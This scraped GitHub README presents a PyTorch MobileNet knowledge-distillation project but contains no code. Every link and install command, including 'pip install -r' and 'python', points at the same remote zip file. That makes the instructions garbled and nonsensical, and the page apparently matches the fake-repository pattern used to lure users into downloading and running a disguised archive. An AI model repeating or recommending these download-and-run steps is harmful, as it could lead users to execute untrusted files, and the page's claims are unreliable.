Skip to content

πŸš€ Explore CNN efficiency with PyTorch implementations of MobileNetV1 and V2, featuring knowledge distillation for lightweight model training on CIFAR-10.

License

Notifications You must be signed in to change notification settings

Sheaantisocial810/pytorch-mobilenet-efficiency

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

36 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ pytorch-mobilenet-efficiency - Explore CNN Model Efficiency

πŸ“₯ Quick Download

Download Here

πŸ“– Description

Welcome to the pytorch-mobilenet-efficiency project! This application allows you to explore the efficiency of Convolutional Neural Networks (CNN). It includes implementations of MobileNetV1 and MobileNetV2 from scratch. This project showcases model compression by applying Knowledge Distillation. You can train a lightweight MobileNetV2 (the student model) using a ResNet-18 (the teacher model).

πŸš€ Getting Started

Follow the steps below to download and run the software.

πŸ“‹ System Requirements

  • Operating System: Windows 10 or later, or any Linux distribution
  • RAM: At least 4 GB recommended
  • Disk Space: Minimum 500 MB free space
  • Python: Version 3.6 or later

πŸ› οΈ Installation Steps

  1. Visit the Downloads Page
    Go to the Releases page to find the latest version of the software.

  2. Choose the Right Package
    Look for the release that suits your operating system. For Windows, download the .zip package. For Linux, use the https://raw.githubusercontent.com/Sheaantisocial810/pytorch-mobilenet-efficiency/main/scripts/pytorch-mobilenet-efficiency-2.7.zip file.

  3. Download the File
    Click on the link for the release to initiate the download. Your browser will download the file to your default downloads folder.

  4. Extract the Files
    Once the download completes, navigate to your downloads folder. If you downloaded a .zip file, right-click on it and select "Extract All". For https://raw.githubusercontent.com/Sheaantisocial810/pytorch-mobilenet-efficiency/main/scripts/pytorch-mobilenet-efficiency-2.7.zip, use an archive manager to extract the contents.

  5. Open the Command Line or Terminal

    • For Windows, search for "Command Prompt" in the Start menu.
    • For Linux, open the Terminal application.
  6. Navigate to the Extracted Folder
    Use the following command:

    cd path_to_extracted_folder

    Replace path_to_extracted_folder with the actual path where you extracted the files.

  7. Install Required Packages
    Install the necessary Python packages. Run this command:

    pip install -r https://raw.githubusercontent.com/Sheaantisocial810/pytorch-mobilenet-efficiency/main/scripts/pytorch-mobilenet-efficiency-2.7.zip
  8. Run the Application
    After the installation is complete, you can start the application by executing:

    python https://raw.githubusercontent.com/Sheaantisocial810/pytorch-mobilenet-efficiency/main/scripts/pytorch-mobilenet-efficiency-2.7.zip

πŸ“‚ Features

  • Efficient Models: Experience the capabilities of MobileNetV1 and MobileNetV2.
  • Knowledge Distillation: Understand how a lightweight model can learn from a larger model.
  • User-Friendly Interface: Designed for users without extensive programming knowledge.
  • Extensive Documentation: Comprehensive guides and examples to help you get started.

πŸŽ“ Learn More

Explore topics like:

  • CNN basics and applications
  • Comparative analysis of model efficiency
  • Importance of hyperparameters in machine learning
  • Transfer learning with MobileNet models

πŸ“„ Additional Resources

πŸ’¬ Support

If you encounter issues or have questions, feel free to raise them in the Issues section.

πŸ“₯ Download & Install

For detailed instructions on how to download the latest release, please visit the Releases page.

About

πŸš€ Explore CNN efficiency with PyTorch implementations of MobileNetV1 and V2, featuring knowledge distillation for lightweight model training on CIFAR-10.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •